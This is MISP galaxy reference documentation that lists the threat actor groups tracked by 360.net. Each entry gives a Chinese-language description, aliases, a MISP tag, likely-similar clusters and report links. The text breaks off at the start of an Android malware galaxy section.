Introduction

MISP logo

The MISP threat sharing platform is a free and open source software helping information sharing of threat intelligence including cyber security indicators, financial fraud or counter-terrorism information. The MISP project includes multiple sub-projects to support the operational requirements of analysts and improve the overall quality of information shared.

MISP galaxy is a simple method to express a large object called cluster that can be attached to MISP events or attributes. A cluster can be composed of one or more elements. Elements are expressed as key-values. There are default vocabularies available in MISP galaxy but those can be overwritten, replaced or updated as you wish. Existing clusters and vocabularies can be used as-is or as a template. MISP distribution can be applied to each cluster to permit a limited or broader distribution scheme. The following document is generated from the machine-readable JSON describing the MISP galaxy.

Funding and Support

The MISP project is financially and resource supported by CIRCL Computer Incident Response Center Luxembourg .

CIRCL logo

A CEF (Connecting Europe Facility) funding under CEF-TC-2016-3 - Cyber Security has been granted from 1st September 2017 until 31th August 2019 as Improving MISP as building blocks for next-generation information sharing.

CEF funding

If you are interested to co-fund projects around MISP, feel free to get in touch with us.

MISP galaxy

360.net Threat Actors

Known or estimated adversary groups as identified by 360.net..

360.net Threat Actors is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

360.net

CIA - APT-C-39

APT-C-39是一个来自美国,与NSA存在联系,系属于CIA的高规格,高水平的APT组织。对中国关键领域进行了长达十一年的网络渗透攻击。中国航空航天、科研机构、石油行业、大型互联网公司以及政府机构等多个单位均遭到不同程度的攻击

The tag is: misp-galaxy:360net-threat-actor="CIA - APT-C-39"

CIA - APT-C-39 is also known as:

Table 1. Table References

Links

https://apt.360.net/report/apts/96.html

https://apt.360.net/report/apts/12.html

海莲花 - APT-C-00

海莲花(OceanLotus)APT团伙是一个高度组织化的、专业化的境外国家级黑客组织,其最早由360发现并披露。该组织至少自2012年4月起便针对中国政府、科研院所、海事机构、海域建设、航运企业等相关重要领域展开了有组织、有计划、有针对性的长时间不间断攻击。

The tag is: misp-galaxy:360net-threat-actor="海莲花 - APT-C-00"

海莲花 - APT-C-00 is also known as:

  • OceanLotus

海莲花 - APT-C-00 has relationships with:

  • similar: misp-galaxy:threat-actor="APT32" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT32 - G0050" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Canvas Cyclone" with estimative-language:likelihood-probability="likely"

Table 2. Table References

Links

https://apt.360.net/report/apts/93.html

https://apt.360.net/report/apts/1.html

https://apt.360.net/report/apts/94.html

摩诃草 - APT-C-09

摩诃草组织(APT-C-09),又称HangOver、VICEROY TIGER、The Dropping Elephant、Patchwork,是一个来自南亚地区的境外APT组织,该组织已持续活跃了12年。摩诃草组织最早由Norman安全公司于2013年曝光,随后又有其他安全厂商持续追踪并披露该组织的最新活动,但该组织并未由于相关攻击行动曝光而停止对相关目标的攻击,相反从2015年开始更加活跃。摩诃草组织主要针对中国、巴基斯坦等亚洲地区国家进行网络间谍活动,其中以窃取敏感信息为主。相关攻击活动最早可以追溯到2009年11月,至今还非常活跃。在针对中国地区的攻击中,该组织主要针对政府机构、科研教育领域进行攻击,其中以科研教育领域为主。

The tag is: misp-galaxy:360net-threat-actor="摩诃草 - APT-C-09"

摩诃草 - APT-C-09 is also known as:

  • HangOver

  • VICEROY TIGER

  • The Dropping Elephant

  • Patchwork

摩诃草 - APT-C-09 has relationships with:

  • similar: misp-galaxy:threat-actor="VICEROY TIGER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="QUILTED TIGER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Patchwork - G0040" with estimative-language:likelihood-probability="likely"

Table 3. Table References

Links

https://apt.360.net/report/apts/110.html

https://apt.360.net/report/apts/6.html

黄金鼠 - APT-C-27

从2014年11月起至今,黄金鼠组织(APT-C-27)对叙利亚地区展开了有组织、有计划、有针对性的长时间不间断攻击。攻击平台从开始的Windows平台逐渐扩展至Android平台,截至目前我们一共捕获了Android平台攻击样本29个,Windows平台攻击样本55个,涉及的C&C域名9个。将APT-C-27组织命名为黄金鼠,主要是考虑了以下几方面的因素:一是该组织在攻击过程中使用了大量的资源,说明该攻击组织资源丰富,而黄金鼠有长期在野外囤积粮食的习惯,字面上也有丰富的含义;二、该攻击组织通常是间隔一段时间出来攻击一次,这跟鼠有相通的地方;三是黄金仓鼠是叙利亚地区一种比较有代表性的动物。

The tag is: misp-galaxy:360net-threat-actor="黄金鼠 - APT-C-27"

黄金鼠 - APT-C-27 is also known as:

Table 4. Table References

Links

https://apt.360.net/report/apts/100.html

https://apt.360.net/report/apts/98.html

https://apt.360.net/report/apts/26.html

Lazarus - APT-C-26

Lazarus组织是疑似来自朝鲜的APT组织,该组织长期对韩国、美国进行渗透攻击,此外还对全球的金融机构进行攻击,堪称全球金融机构的最大威胁。该组织最早的攻击活动可以追溯到2007年。据国外安全公司的调查显示,Lazarus组织与2014 年索尼影业遭黑客攻击事件,2016 年孟加拉国银行数据泄露事件,2017年美国国防承包商、美国能源部门及英国、韩国等比特币交易所被攻击等事件有关。而2017年席卷全球的最臭名昭著的安全事件“Wannacry”勒索病毒也被怀疑是该组织所为。

The tag is: misp-galaxy:360net-threat-actor="Lazarus - APT-C-26"

Lazarus - APT-C-26 is also known as:

  • APT38

Lazarus - APT-C-26 has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT38 - G0082" with estimative-language:likelihood-probability="likely"

Table 5. Table References

Links

https://apt.360.net/report/apts/9.html

https://apt.360.net/report/apts/101.html

https://apt.360.net/report/apts/90.html

黄金雕 - APT-C-34

黄金雕组织的活动主要影响中亚地区,大部分集中在哈萨克斯坦国境内,攻击目标涉及教育行业、政府机关人员、科研人员、媒体工作人员、部分商务工业、军方人员、宗教人员、政府异见人士和外交人员等。该组织使用社会工程学、物理接触、无线电监听等方式进行网络攻击,同时也采购了HackingTeam、NSO Group等网络军火商的武器,具备0day漏洞的高级入侵能力。360参照中亚地区擅长驯养猎鹰进行狩猎的习俗特性,将该组织命名为黄金雕(APT-C-34)。

The tag is: misp-galaxy:360net-threat-actor="黄金雕 - APT-C-34"

黄金雕 - APT-C-34 is also known as:

Table 6. Table References

Links

https://apt.360.net/report/apts/11.html

盲眼鹰 - APT-C-36

从2018年4月起至今,一个疑似来自南美洲的APT组织盲眼鹰(APT-C-36)针对哥伦比亚政府机构和大型公司(金融、石油、制造等行业)等重要领域展开了有组织、有计划、针对性的长期不间断攻击。其攻击平台主要为Windows,攻击目标锁定为哥伦比亚政企机构。由于该组织攻击的目标中有一个特色目标是哥伦比亚盲人研究所,而哥伦比亚在足球领域又被称为南美雄鹰,结合该组织的一些其它特点以及360威胁情报中心对 APT 组织的命名规则,我们将该组织命名为盲眼鹰(APT-C-36)。

The tag is: misp-galaxy:360net-threat-actor="盲眼鹰 - APT-C-36"

盲眼鹰 - APT-C-36 is also known as:

Table 7. Table References

Links

https://apt.360.net/report/apts/83.html

毒针 - APT-C-31

2018年11月25日,360高级威胁应对团队就在全球范围内第一时间发现了一起针对俄罗斯的APT攻击行动,攻击目标则指向俄罗斯总统办公室所属的医疗机构,此次攻击行动使用了Flash 0day漏洞CVE-2018-15982和Hacking Team的RCS后门程序,结合被攻击目标医疗机构的职能特色,360将此次APT攻击命名为“毒针”行动。

The tag is: misp-galaxy:360net-threat-actor="毒针 - APT-C-31"

毒针 - APT-C-31 is also known as:

Table 8. Table References

Links

https://apt.360.net/report/apts/10.html

ArmaRat - APT-C-33

2016年7月,360发现一起针对伊朗Android手机用户长达两年之久的APT攻击活动。攻击者借助社交软件Telegram分享经过伪装的ArmaRat木马,入侵成功后攻击者可以完全控制用户手机,并对用户手机进行实时监控。由于该木马演变过程中C&C及代码结构均出现“arma”关键字,所以我们将该组织命名为“ArmaRat”。

The tag is: misp-galaxy:360net-threat-actor="ArmaRat - APT-C-33"

ArmaRat - APT-C-33 is also known as:

Table 9. Table References

Links

https://apt.360.net/report/apts/48.html

军刀狮 - APT-C-38

从2015年7月起至今,军刀狮组织(APT-C-38)在中东地区展开了有组织、有计划、针对性的不间断攻击,其攻击平台为Windows和Android。由于军刀狮组织的攻击目标有一个主要的特色目标是西亚中东某国的库尔德人,另Windows端RAT包含的PDB路径下出现多次的“Saber”,而亚洲狮为该中东国家的代表动物,结合该组织的一些其它特点以及360对 APT 组织的命名规则,我们将该组织命名为军刀狮(APT-C-38)。

The tag is: misp-galaxy:360net-threat-actor="军刀狮 - APT-C-38"

军刀狮 - APT-C-38 is also known as:

Table 10. Table References

Links

https://apt.360.net/report/apts/30.html

拍拍熊 - APT-C-37

拍拍熊组织(APT-C-37)针对极端组织“伊斯兰国”展开了有组织、有计划、针对性的长期不间断攻击,其攻击平台为Windows和Android。

The tag is: misp-galaxy:360net-threat-actor="拍拍熊 - APT-C-37"

拍拍熊 - APT-C-37 is also known as:

Table 11. Table References

Links

https://apt.360.net/report/apts/28.html

https://apt.360.net/report/apts/103.html

人面狮 - APT-C-15

人面狮行动是活跃在中东地区的网络间谍活动,主要目标可能涉及到埃及和以色列等国家的不同组织,目的是窃取目标敏感数据信息。活跃时间主要集中在2014年6月到2015年11月期间,相关攻击活动最早可以追溯到2011年12月。主要利用社交网络进行水坑攻击,截止到目前总共捕获到恶意代码样本314个,C&C域名7个。

The tag is: misp-galaxy:360net-threat-actor="人面狮 - APT-C-15"

人面狮 - APT-C-15 is also known as:

Table 12. Table References

Links

https://apt.360.net/report/apts/8.html

美人鱼 - APT-C-07

美人鱼组织(APT-C-07),来自于中东的境外APT组织,已持续活跃了9年。 主要针对政府机构进行网络间谍活动,以窃取敏感信息为目的,已经证实有针对丹麦外交部的攻击。

The tag is: misp-galaxy:360net-threat-actor="美人鱼 - APT-C-07"

美人鱼 - APT-C-07 is also known as:

Table 13. Table References

Links

https://apt.360.net/report/apts/4.html

双尾蝎 - APT-C-23

2016年5月起至今,双尾蝎组织(APT-C-23)对巴勒斯坦教育机构、军事机构等重要领域展开了有组织、有计划、有针对性的长时间不间断攻击。攻击平台包括Windows与Android,攻击范围主要为中东地区,截至目前我们一共捕获了Android样本24个,Windows样本19个,涉及的C&C域名29个。将APT-C-23组织命名为双尾蝎,主要是考虑了以下几方面的因素:一是该组织同时攻击了巴勒斯坦和以色列这两个存在一定敌对关系的国家,这种情况在以往并不多见;二是该组织同时在Windows和Android两种平台上发动攻击。虽然以往我们截获的APT组织中也有一些进行多平台攻击的例子,如海莲花,但绝大多数APT组织攻击的重心仍然是Windows平台。而同时注重两种平台,并且在Android平台上攻击如此活跃的APT组织,在以往并不多见。第三个原因就是蝎子在巴以地区是一种比较有代表性的动物。

The tag is: misp-galaxy:360net-threat-actor="双尾蝎 - APT-C-23"

双尾蝎 - APT-C-23 is also known as:

Table 14. Table References

Links

https://apt.360.net/report/apts/27.html

蓝宝菇 - APT-C-12

从2011年开始持续至今,高级攻击组织蓝宝菇(APT-C-12)对我国政府、军工、科研、金融等重点单位和部门进行了持续的网络间谍活动。该组织主要关注核工业和科研等相关信息。被攻击目标主要集中在中国大陆境内。

The tag is: misp-galaxy:360net-threat-actor="蓝宝菇 - APT-C-12"

蓝宝菇 - APT-C-12 is also known as:

  • 核危机行动(Operation NuclearCrisis)

Table 15. Table References

Links

https://apt.360.net/report/apts/7.html

毒云藤 - APT-C-01

APT-C-01又名毒云藤,是一个长期针对中国境内的APT组织,至少从2007年开始活跃。曾对中国国防、政府、科技、教育以及海事机构等重点单位和部门进行了长达11年的网络间谍活动,主要关注军工、中美关系、两岸关系和海洋相关的领域,旨在窃取重大决策及敏感信息。APT-C-01由360威胁情报中心首次披露,结合该组织关联地区常见的蔓藤植物,因此将其命名为“毒云藤”。

The tag is: misp-galaxy:360net-threat-actor="毒云藤 - APT-C-01"

毒云藤 - APT-C-01 is also known as:

  • 穷奇

  • 白海豚

  • 绿斑

Table 16. Table References

Links

https://apt.360.net/report/apts/2.html

Darkhotel - APT-C-06

Darkhotel(APT-C-06)是一个长期针对企业高管、国防工业、电子工业等重要机构实施网络间谍攻击活动的APT组织。2014年11月,卡巴斯基实验室的安全专家首次发现了Darkhotel APT组织,并声明该组织至少从2010年就已经开始活跃,目标基本锁定在韩国、中国、俄罗斯和日本。卡巴斯基将该组织命名为Darkhotel(暗黑客栈),是因为他们的一次攻击行动被曝光,主要是利用酒店的无线网络有针对性的瞄准生产制造、国防、投资资本、私人股权投资、汽车等行业的精英管理者。

The tag is: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06"

Darkhotel - APT-C-06 is also known as:

  • Luder

  • Karba

  • Tapaoux

  • Dubnium

  • SIG25

Darkhotel - APT-C-06 has relationships with:

  • similar: misp-galaxy:threat-actor="DarkHotel" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Darkhotel - G0012" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="DUBNIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Zigzag Hail" with estimative-language:likelihood-probability="likely"

Table 17. Table References

Links

https://apt.360.net/report/apts/97.html

https://apt.360.net/report/apts/3.html

奇幻熊 - APT-C-20

APT28(APT-C-20),又称Pawn Storm、Sofacy、Sednit、Fancy Bear和Strontium。APT28组织被怀疑幕后和俄罗斯政府有关,该组织相关攻击时间最早可以追溯到2004年。其主要目标包括国防工业、军队、政府组织和媒体。期间使用了大量0day漏洞,相关恶意代码除了针对windows、Linux等PC操作系统,还会针对苹果IOS等移动设备操作系统。早前也曾被怀疑与北大西洋公约组织网络攻击事件有关。APT28组织在2015年第一季度有大量的活动,用于攻击NATO成员国和欧洲、亚洲、中东政府。目前有许多安全厂商怀疑其与俄罗斯政府有关,而早前也曾被怀疑秘密调查MH17事件。从2016年开始该组织最新的目标瞄准了土耳其高级官员。

The tag is: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20"

奇幻熊 - APT-C-20 is also known as:

  • APT28

  • Pawn Storm

  • Sofacy Group

  • Sednit

  • Fancy Bear

  • STRONTIUM

奇幻熊 - APT-C-20 has relationships with:

  • similar: misp-galaxy:threat-actor="APT28" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT28 - G0007" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="STRONTIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Forest Blizzard" with estimative-language:likelihood-probability="likely"

Table 18. Table References

Links

https://apt.360.net/report/apts/120.html

https://apt.360.net/report/apts/72.html

沙虫 - APT-C-13

沙虫组织的主要目标领域有:政府、教育、能源机构和电信运营商。进一步主要针对欧美国家政府、北约,以及乌克兰政府展开间谍活动。该组织曾使用0day漏洞(CVE-2014-4114)针对乌克兰政府发起了一次钓鱼攻击。而在威尔士举行的讨论乌克兰危机的北约峰会针对美国也进行了攻击。该组织还使用了BlackEnergy恶意软件。而且沙虫组织不仅仅只进行常规的网络间谍活动,还针对SCADA系统进行了攻击,研究者认为相关活动是为了之后的网络攻击进行侦查跟踪。另外有少量证据表明,针对乌克兰电力系统等工业领域的网络攻击中涉及到了BlackEnergy恶意软件。如果此次攻击的确使用了BlackEnergy恶意软件的话,那有可能幕后会关联到沙虫组织。

The tag is: misp-galaxy:360net-threat-actor="沙虫 - APT-C-13"

沙虫 - APT-C-13 is also known as:

  • SandWorm

沙虫 - APT-C-13 has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Seashell Blizzard" with estimative-language:likelihood-probability="likely"

Table 19. Table References

Links

https://apt.360.net/report/apts/87.html

https://apt.360.net/report/apts/69.html

肚脑虫 - APT-C-35

APT-C-35(肚脑虫)组织,又称Donot,是一个针对克什米尔地区相关国家的政府机构等领域进行网络间谍活动,以窃取敏感信息为主的攻击组织。该组织于2017年3月由360追日团队首次曝光,随后有数个国内外安全团队持续追踪并披露该组织的最新攻击活动。攻击活动最早始于2016年4月,至今活跃,攻击方式主要采用鱼叉邮件进行攻击。

The tag is: misp-galaxy:360net-threat-actor="肚脑虫 - APT-C-35"

肚脑虫 - APT-C-35 is also known as:

  • Donot

Table 20. Table References

Links

https://apt.360.net/report/apts/102.html

https://apt.360.net/report/apts/32.html

蔓灵花 - APT-C-08

蔓灵花组织利用鱼叉邮件以及系统漏洞等方式,主要攻击政府、电力和工业相关单位,以窃取敏感信息为主。国外样本最早出现在2013年11月,样本编译时间集中出现在2015年7月至2016年9月期间,2016年网络安全公司Forcepoint最早报告了这一组织,随后被多次发现,至今还非常活跃。

The tag is: misp-galaxy:360net-threat-actor="蔓灵花 - APT-C-08"

蔓灵花 - APT-C-08 is also known as:

Table 21. Table References

Links

https://apt.360.net/report/apts/5.html

索伦之眼 - APT-C-16

索伦之眼组织(APT-C-16),又称Sauron、Strider。该组织主要针对中国、俄罗斯等多个国家进行网络间谍活动,其中以窃取敏感信息为主。相关攻击活动最早可以追溯到2010年,至今还非常活跃。该组织整个攻击过程中是高度隐蔽,且针对性极强,对特定目标采用定制的恶意程序或通信设施,不会重复使用相关攻击资源。相关恶意代码复杂度可以与方程式(Equation)媲美,其综合能力不弱于震网(Stuxnet)、火焰(Flame)等APT组织。

The tag is: misp-galaxy:360net-threat-actor="索伦之眼 - APT-C-16"

索伦之眼 - APT-C-16 is also known as:

  • Sauron

  • Strider

索伦之眼 - APT-C-16 has relationships with:

  • similar: misp-galaxy:threat-actor="ProjectSauron" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Strider - G0041" with estimative-language:likelihood-probability="likely"

Table 22. Table References

Links

https://apt.360.net/report/apts/70.html

潜行者 - APT-C-30

潜行者组织主要搜集东南亚国家政府机构、国防部门、情报机构等机构敏感信息,其中针对我国就进行了超十年左右的网络攻击。主要针对政府、通信等领域重点单位,攻击最早可以关联追溯到2009年,最早的样本编译时间为2008年,攻击活动一直持续至今。

The tag is: misp-galaxy:360net-threat-actor="潜行者 - APT-C-30"

潜行者 - APT-C-30 is also known as:

Table 23. Table References

Links

https://apt.360.net/report/apts/82.html

响尾蛇 - APT-C-24

APT-C-24又名Sidewinder、Rattlesnake等,是具有印度背景的APT组织。该组织通常以巴基斯坦、中国、尼泊尔等在内的南亚及周边地区的国家为目标,主要攻击该国家/地区的政府、军事、外交等领域,最常见的感染媒介之一就是使用带有漏洞的恶意文档。2020年初,该组织还使用与COVID-19相关的诱饵文件对孟加拉国、中国和巴基斯坦发起了网络攻击,通过近年来对该组织的追踪发现,Sidewinder越来越倾向于利用诸如COVID-19之类的趋势话题或各种政治问题作为一种社会工程技术来攻击其目标,因此需要更加地警惕小心。

The tag is: misp-galaxy:360net-threat-actor="响尾蛇 - APT-C-24"

响尾蛇 - APT-C-24 is also known as:

  • SideWinder

响尾蛇 - APT-C-24 has relationships with:

  • similar: misp-galaxy:threat-actor="RAZOR TIGER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Sidewinder - G0121" with estimative-language:likelihood-probability="likely"

Table 24. Table References

Links

https://apt.360.net/report/apts/92.html

ScarCruft - APT-C-28

APT-C-28组织,又名ScarCruft、APT37 (Reaper)、Group123,是一个来自于东北亚地区的境外APT组织,其相关攻击活动最早可追溯到2012年,且至今依然保持活跃状态。APT-C-28组织主要针对韩国等亚洲国家进行网络间谍活动,其中以窃取战略军事、政治、经济利益相关的情报和敏感数据为主。APT-C-28组织最早由卡巴斯基公司于2016年6月曝光,随后各个安全厂商对其进行了持续追踪并不断曝光该组织的最新攻击活动。

The tag is: misp-galaxy:360net-threat-actor="ScarCruft - APT-C-28"

ScarCruft - APT-C-28 is also known as:

  • APT37(Reaper)

  • Group123

ScarCruft - APT-C-28 has relationships with:

  • similar: misp-galaxy:threat-actor="APT37" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT37 - G0067" with estimative-language:likelihood-probability="likely"

Table 25. Table References

Links

https://apt.360.net/report/apts/79.html

Turla - APT-C-29

Turla Group又名Waterbug、Venomous Bear、Group 88等,是具有俄罗斯背景的APT组织,至少从1996年就开始活跃,2015年以后攻击活动更加频繁。Turla组织的攻击目标遍及全球多个国家,攻击对象涉及政府、外交、军事、教育、研究和医疗等多个领域,因开展水坑攻击和鱼叉式网络钓鱼攻击以及利用定制化的恶意软件而闻名。

The tag is: misp-galaxy:360net-threat-actor="Turla - APT-C-29"

Turla - APT-C-29 is also known as:

  • Turla, Waterbug, Venomous Bear, Group 88

Table 26. Table References

Links

https://apt.360.net/report/apts/81.html

https://apt.360.net/report/apts/88.html

Carbanak - APT-C-11

Carbanak(即Anunak)攻击组织,是一个跨国网络犯罪团伙。2013年起,该犯罪团伙总计向全球约30个国家和地区的100家银行、电子支付系统和其他金融机构发动了攻击,目前相关攻击活动还很活跃。

The tag is: misp-galaxy:360net-threat-actor="Carbanak - APT-C-11"

Carbanak - APT-C-11 is also known as:

  • Anunak

Carbanak - APT-C-11 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Carbanak - G0008" with estimative-language:likelihood-probability="likely"

Table 27. Table References

Links

https://apt.360.net/report/apts/68.html

飞鲨 - APT-C-17

APT-C-17是360发现的一起APT攻击,我们将此次攻击行动命名为“飞鲨”行动。相关攻击行动最早可以追溯到2013年1月,持续活跃到2014年3月,主要针对中国航空航天领域,目的是窃取目标用户敏感数据信息,近期暂无监控到相关攻击事件。

The tag is: misp-galaxy:360net-threat-actor="飞鲨 - APT-C-17"

飞鲨 - APT-C-17 is also known as:

Table 28. Table References

Links

https://apt.360.net/report/apts/71.html

方程式 - APT-C-40

APT-C-40(方程式)是史上最强APT组织。该团伙已活跃近20年,并且在攻击复杂性和攻击技巧方面超越了历史上所有的网络攻击组织,并被认为是著名的震网(Stuxnet)和火焰(Flame)病毒幕后的操纵者。

The tag is: misp-galaxy:360net-threat-actor="方程式 - APT-C-40"

方程式 - APT-C-40 is also known as:

Table 29. Table References

Links

https://apt.360.net/report/apts/85.html

透明部落 - APT-C-56

Operation_C-Major又名Transparent Tribe、APT36、Mythic Leopard等,是具有巴基斯坦背景的APT组织,攻击活动影响范围较广,但主要攻击目标为印度国家的政府、军方等组织,此外为保障国家利益,巴基斯坦境内的民间团体或政治家也是其主要攻击对象。该组织于2013年被首次发现,近年来一直处于活跃状态。2020年初,利用有关印巴两国边境争端的诱饵文档,向印度政府组织、国防人员发起了鱼叉式网络攻击,也就是‘Honey Trap’行动,以此来窃取国家机密及敏感数据。

The tag is: misp-galaxy:360net-threat-actor="透明部落 - APT-C-56"

透明部落 - APT-C-56 is also known as:

  • APT36

  • ProjectM

  • C-Major

透明部落 - APT-C-56 has relationships with:

  • similar: misp-galaxy:threat-actor="Operation C-Major" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Transparent Tribe - G0134" with estimative-language:likelihood-probability="likely"

Table 30. Table References

Links

腾云蛇 - APT-C-61

APT-C-61又名腾云蛇,最早活跃可追溯到2020年1月,至今还很活跃,主要攻击目标为巴基斯坦、孟加拉等国家的国家机构、军工、科研、国防等重要领域,攻击时通过鱼叉邮件配合社会工程学手段进行渗透,向目标设备传播恶意程序,暗中控制目标设备,持续窃取设备上的敏感文件。因其使用的C2、载荷下发、窃取的数据存储等均依赖于云服务,且使用的木马为python语言编写而得名。

The tag is: misp-galaxy:360net-threat-actor="腾云蛇 - APT-C-61"

腾云蛇 - APT-C-61 is also known as:

Table 31. Table References

Links

Kimsuky - APT-C-55

Kimsuky 是位于朝鲜的APT组织,又名(Mystery Baby, Baby Coin, Smoke Screen, BabyShark, Cobra Venom)等,最早由Kaspersky在2013年披露,该组织长期针对于韩国的智囊团、政府外交、新闻组织、教育学术组织等进行攻击,在过去几年里,他们将攻击目标扩大到包括美国、俄罗斯和欧洲各国在内的国家。主要目的为窃取情报、间谍活动等。该组织十分活跃,常用的攻击载荷为带有漏洞的hwp文件、恶意宏文件、释放载荷的PE文件等。

The tag is: misp-galaxy:360net-threat-actor="Kimsuky - APT-C-55"

Kimsuky - APT-C-55 is also known as:

Table 32. Table References

Links

卢甘斯克组织 - APT-C-46

2019年初,国外安全厂商披露了一起疑似卢甘斯克背景的APT组织针对乌克兰政府的定向攻击活动,根据相关报告分析该组织的攻击活动至少可以追溯到2014年,曾大量通过网络钓鱼、水坑攻击等方式针对乌克兰政府机构进行攻击,在其过去的攻击活动中曾使用过开源Quasar RAT和VERMIN等恶意软件,捕获目标的音频和视频,窃取密码,获取机密文件等等。

The tag is: misp-galaxy:360net-threat-actor="卢甘斯克组织 - APT-C-46"

卢甘斯克组织 - APT-C-46 is also known as:

  • APT-C-46

Table 33. Table References

Links

https://apt.360.net/report/apts/169.html

旺刺组织 - APT-C-47

近期,360安全大脑检测到多起ClickOnce恶意程序的攻击活动,通过360高级威胁研究院的深入研判分析,发现这是一起来自半岛地区未被披露APT组织的攻击行动,攻击目标涉及与半岛地区有关联的实体机构和个人,根据360安全大脑的数据分析显示,该组织的攻击活动最早可以追溯到2018年。目前还没有任何安全厂商公开披露该组织的攻击活动,也没有安全厂商公开披露利用该技术的真实APT攻击事件。由于此次攻击活动属于360全球首次捕获披露,我们根据该组织擅长攻击技术的谐音,将其命名为“旺刺”组织,并为其分配了新编号APT-C-47。

The tag is: misp-galaxy:360net-threat-actor="旺刺组织 - APT-C-47"

旺刺组织 - APT-C-47 is also known as:

  • APT-C-47

Table 34. Table References

Links

https://apt.360.net/report/apts/168.html

DomesticKitten - APT-C-50

Domestic Kitten(Check Point),别名APT-C-50。最早被国外安全厂商披露,自2016年以来一直在进行广泛而有针对性的攻击,攻击目标包括中东某国内部持不同政见者和反对派力量,以及ISIS的拥护者和主要定居在中东某国西部的库尔德少数民族。值得注意的是,所有攻击目标都是中东某国公民。伊斯兰革命卫队(IRGC)、情报部、内政部等中东某国政府机构可能为该组织提供支持。

The tag is: misp-galaxy:360net-threat-actor="DomesticKitten - APT-C-50"

DomesticKitten - APT-C-50 is also known as:

  • APT-C-50

Table 35. Table References

Links

https://apt.360.net/report/apts/166.html

SandCat - APT-C-32

SandCat由卡巴斯基在2018年首次发现,该组织一直在使用FinFisher/ FinSpy间谍软件和CHAINSHOT攻击框架,并有使用0 Day漏洞的能力,曾经使用过CVE-2018-8589和CVE-2018-8611。主要攻击中东、非洲和东欧等地区的目标。

The tag is: misp-galaxy:360net-threat-actor="SandCat - APT-C-32"

SandCat - APT-C-32 is also known as:

Table 36. Table References

Links

CNC - APT-C-48

该组织于2019年发现,因为样本的pdb路径中有cnc_client字符,所以暂时叫做CNC组织。该组织定向攻击我国教育、航天、军工和医疗等行业,窃取情报。在攻击过程中会尝试使用Nday,并且有能够开发GO语言木马的开发人员。

The tag is: misp-galaxy:360net-threat-actor="CNC - APT-C-48"

CNC - APT-C-48 is also known as:

Table 37. Table References

Links

蓝色魔眼 - APT-C-41

APT-C-41,是一个具有土耳其背景的APT小组,该APT组织最早的攻击活动可以追溯到2012年。该组织主要针对意大利、土耳其、比利时、叙利亚、欧洲等地区和国家进行攻击活动。2020年,360发现了该组织针对我国相关单位的攻击,并将其命名为APT-C-41。

The tag is: misp-galaxy:360net-threat-actor="蓝色魔眼 - APT-C-41"

蓝色魔眼 - APT-C-41 is also known as:

Table 38. Table References

Links

https://apt.360.net/report/apts/158.html

Machete - APT-C-43

El Machete由卡巴斯基首次发现,最早的攻击可以追溯至2014年,主要针对拉丁美洲。360白泽实验室发现了一款Python语言编写的新型后门病毒Pyark,通过对该后门的深入挖掘和溯源分析,我们发现了一系列从2019年起便一直活跃的高级威胁行动,攻击者通过入侵委内瑞拉的多处军事机构,部署后门病毒,不间断的监控和窃取最新的军事机密。

The tag is: misp-galaxy:360net-threat-actor="Machete - APT-C-43"

Machete - APT-C-43 is also known as:

  • Machete

Machete - APT-C-43 has relationships with:

  • similar: misp-galaxy:threat-actor="El Machete" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Machete - G0095" with estimative-language:likelihood-probability="likely"

Table 39. Table References

Links

https://apt.360.net/report/apts/159.html

Gamaredon - APT-C-53

Gamaredon又名Primitive Bear、Winterflounder、BlueAlpha,至少从2013年就开始活跃,是由俄罗斯政府赞助的APT组织。Gamaredon组织主要针对乌克兰的政府、国防、外交、新闻媒体等发起网络间谍活动。近年来,该组成员也不断升级其技战术,开发定制化的恶意软件,这也加大了安全人员对其进行捕获与追踪的难度。

The tag is: misp-galaxy:360net-threat-actor="Gamaredon - APT-C-53"

Gamaredon - APT-C-53 is also known as:

Table 40. Table References

Links

北非狐 - APT-C-44

北非狐组织(APT-C-44),是一个来自阿尔及利亚的境外APT组织,该组织已持续活跃了3年。北非狐组织主要针对中东地区进行网络间谍活动,以窃取敏感信息为主。相关攻击活动最早可以追溯到2017年11月,至今仍活跃着。

The tag is: misp-galaxy:360net-threat-actor="北非狐 - APT-C-44"

北非狐 - APT-C-44 is also known as:

Table 41. Table References

Links

https://apt.360.net/report/apts/157.html

WellMess - APT-C-42

WELLMESS组织是一个较新的俄语系境外APT组织,最早发现于2017年并持续至今。该组织主要针对亚洲地区进行间谍攻击,并且曾进行过超两年的供应链攻击,同时拥有漏洞利用能力。该组织的目标主要是政府、IT、科研等单位,以窃取文件为主。

The tag is: misp-galaxy:360net-threat-actor="WellMess - APT-C-42"

WellMess - APT-C-42 is also known as:

Table 42. Table References

Links

https://apt.360.net/report/apts/136.html

Android

Android malware galaxy based on multiple open sources..

Android is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Unknown

CopyCat

